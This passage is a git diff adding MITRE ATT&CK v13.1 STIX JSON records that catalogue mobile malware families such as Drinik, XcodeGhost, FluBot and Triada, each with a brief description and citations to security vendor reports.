"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json new file mode 100644 index 0000000000000000000000000000000000000000..19f37ccf31eccf9d247c59d93b454e11404d7ba2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--b8248a25-a1fe-45d7-a32c-0b130c873e58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:33:34.237Z", + "name": "Drinik", + "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Drinik" + ], + "type": "malware", + "id": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "created": "2023-01-18T19:05:43.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1054", + "external_id": "S1054" + }, + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json new file mode 100644 index 0000000000000000000000000000000000000000..6313c0999bd3da3ce43c6788b1ab3e5551a827f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--c5127a3a-708d-467f-9759-2a60ec9bc2dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created": "2017-10-25T14:48:46.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json new file mode 100644 index 0000000000000000000000000000000000000000..f6c3e6f08d71923e1dccbd1fc2ea75a351f1fb36 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--36b2624e-e050-438d-bc53-e3909dd8c1b2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created": "2017-10-25T14:48:42.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json new file mode 100644 index 0000000000000000000000000000000000000000..89dc5d594e8826b75fc3c0584be8085c98f3e73f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--3cf2da12-04c0-44cc-877c-e1ee509631c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "type": "malware", + "created": "2020-12-24T21:41:36.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0549", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T14:29:45.809Z", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json new file mode 100644 index 0000000000000000000000000000000000000000..d7c985cd81b924599cf0b7d3903e7ec5e6fd1f70 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--e4f81d96-b564-4651-a405-e3d881295b08", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "type": "malware", + "created": "2020-07-20T13:27:33.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0489", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489" + }, + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.564Z", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json new file mode 100644 index 0000000000000000000000000000000000000000..863940ea54b2549b1274e1e4c148abc4a39f0ad4 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--891abd3a-ef78-425c-afa8-467e169c6334", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-28T17:20:20.194Z", + "name": "BusyGasper", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "BusyGasper" + ], + "type": "malware", + "id": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "created": "2021-10-01T14:42:48.234Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0655", + "external_id": "S0655" + }, + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json new file mode 100644 index 0000000000000000000000000000000000000000..530aaf65f6c8ba001bc34b0809f75f3a7ffb8ef7 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--96119e33-cae1-49ae-9909-8352cafa11cf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "created": "2017-10-25T14:48:47.674Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0293", + "url": "https://attack.mitre.org/software/S0293" + }, + { + "source_name": "CheckPoint-BrainTest", + "url": "http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/", + "description": "Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest \u2013 A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016." + }, + { + "source_name": "Lookout-BrainTest", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)", + "modified": "2022-04-15T15:36:43.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BrainTest", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json new file mode 100644 index 0000000000000000000000000000000000000000..04b74f68d0ba20fb54983226aaef0cfa47bb358c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ef95d125-49e0-497a-8da3-4fb05fd50782", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "type": "malware", + "created": "2020-12-18T20:14:46.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0545", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-28T18:59:32.817Z", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json new file mode 100644 index 0000000000000000000000000000000000000000..5dbbf90752e64be6968e77dc5dc1532df262d5db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a831de87-12ec-420b-afbe-34ed0f3b271c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Triada" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "type": "malware", + "created": "2019-07-16T14:33:12.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0424", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424" + }, + { + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/", + "source_name": "Kaspersky Triada March 2016" + } + ], + "modified": "2020-05-28T16:52:37.979Z", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json new file mode 100644 index 0000000000000000000000000000000000000000..897e46bd73d945cf54d4b1dd4190abf92c20d2e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--214da390-f24d-49cf-9fd9-cdbbb21ffb9a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "type": "malware", + "created": "2020-11-20T15:44:57.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0535", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535" + }, + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-22T21:48:10.951Z", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json new file mode 100644 index 0000000000000000000000000000000000000000..5af8cd710e9042814ab4b479f6226735b34a2d6d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--912a39c2-3745-4ee9-a785-48f50bc6f67a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T23:02:48.577Z", + "name": "FluBot", + "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "FluBot" + ], + "type": "malware", + "id": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "created": "2023-02-28T20:25:59.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1067", + "external_id": "S1067" + }, + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRU\u021a\u0102, R\u0103zvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. 
Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json new file mode 100644 index 0000000000000000000000000000000000000000..12abe477957470785329cefc1a283c175be8c8ef --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--80900544-0db5-49f8-93ae-b55f51ef2857", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "type": "malware", + "created": "2020-09-11T16:22:02.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0506", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506" + }, + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-29T20:03:42.662Z", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json new file mode 100644 index 0000000000000000000000000000000000000000..7a2ae16882dc36c7af55230f9b9408dbe4185eb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--c425f8c2-81a7-4a32-ad1a-b0aa254b2a63", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created": "2017-10-25T14:48:47.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json new file mode 100644 index 0000000000000000000000000000000000000000..503b886d05df23c214aac63a62a4f1329a461e9c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--901aeb88-7782-44de-bd8e-e037b0b9e31e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "type": "malware", + "created": "2019-11-21T19:16:34.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0419", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419" + }, + { + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "source_name": "CheckPoint SimBad 2019" + } + ], + "modified": "2020-01-27T17:01:31.634Z", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "x_mitre_version": "1.0", + 